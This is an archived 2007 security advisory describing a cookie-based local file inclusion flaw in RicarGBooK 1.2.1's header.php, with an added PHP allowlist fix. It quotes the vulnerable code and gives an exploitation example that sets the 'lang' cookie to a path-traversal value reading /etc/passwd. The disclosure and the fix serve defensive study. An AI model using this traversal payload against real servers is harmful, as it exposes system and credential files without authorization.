securityvulns: SECURITYVULNS:DOC:16775
History: Apr 19, 2007 - 12:00 a.m.

RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   RicarGBooK 1.2.1 

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  • Author :

          Dj7xpl / Dj7xpl[at]Yahoo[dot]com
    
  • Type :

          Local File Inclusion Vulnerability By Cookie
    
  • Download :

          http://ricargbook.adrielmedia.com
    

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  • Vuln Code : -=-= Header.php =-=-

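if (isset($HTTP_COOKIE_VARS["lang"])) {
    // The "lang" cookie is client-controlled and reaches include() unvalidated.
    $guest_lang = $HTTP_COOKIE_VARS["lang"];
    include ('languages/'.$guest_lang);
} else {
    // No cookie: fall back to the configured default language.
    $guest_lang = $language;
    include ('languages/'.$language);
}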

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  • Vuln And Example Picture :

          Edit Cookie :

          Server :  http://[Target]
          Name   :  lang
          Value  :  Local File      E.g   :  ../../../../etc/passwd

          [X] http://dj7xpl.by.ru/r1.jpg
          [X] http://dj7xpl.by.ru/r2.jpg
    

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
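
  • Hardened language selection (added example, not part of the original advisory and not RicarGBooK code) :

          The include in Header.php is safe only if the cookie value can never be anything but the name of a file that already exists in languages/. The sketch below builds that allowlist from the directory and falls back to the default otherwise. The function name resolve_language, the file names english.php / spanish.php and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example (not RicarGBooK code): pick the language file from an
// allowlist built from the languages/ directory itself.

/**
 * Return the language file name to include, or $default when the
 * requested value is not the exact name of a *.php file in $dir.
 * resolve_language() is a hypothetical helper, not a project function.
 */
function resolve_language(string $dir, $requested, string $default): string
{
    // Allowlist: bare names of the *.php files that really exist in $dir.
    $allowed = array_map('basename', glob($dir . '/*.php') ?: []);

    // Cookies can arrive as arrays (lang[]=x); accept strings only.
    if (!is_string($requested)) {
        return $default;
    }
    // Strict match against the allowlist: a value containing "../",
    // a NUL byte or an absolute path is never equal to a bare file name.
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Constructed demo: a temporary languages directory with two files.
$dir = sys_get_temp_dir() . '/languages_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/english.php", '<?php $msg = "Hello";');
file_put_contents("$dir/spanish.php", '<?php $msg = "Hola";');

$language = 'english.php';   // configured default, as $language in Header.php
$samples  = ['spanish.php', '../../../../etc/passwd', 'klingon.php', ['a']];
foreach ($samples as $cookie) {
    $guest_lang = resolve_language($dir, $cookie, $language);
    printf("%-28s -> %s\n", json_encode($cookie, JSON_UNESCAPED_SLASHES), $guest_lang);
}

// In Header.php the include would then only ever see an allowlisted name
// ($_COOKIE is the current equivalent of $HTTP_COOKIE_VARS):
//   $guest_lang = resolve_language('languages', $_COOKIE['lang'] ?? null, $language);
//   include 'languages/' . $guest_lang;
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

          Every sample other than spanish.php resolves to the default english.php, including the traversal value shown in the cookie example above.

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-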

Sp Tnx : str0ke

milw0rm.com [2007-04-12]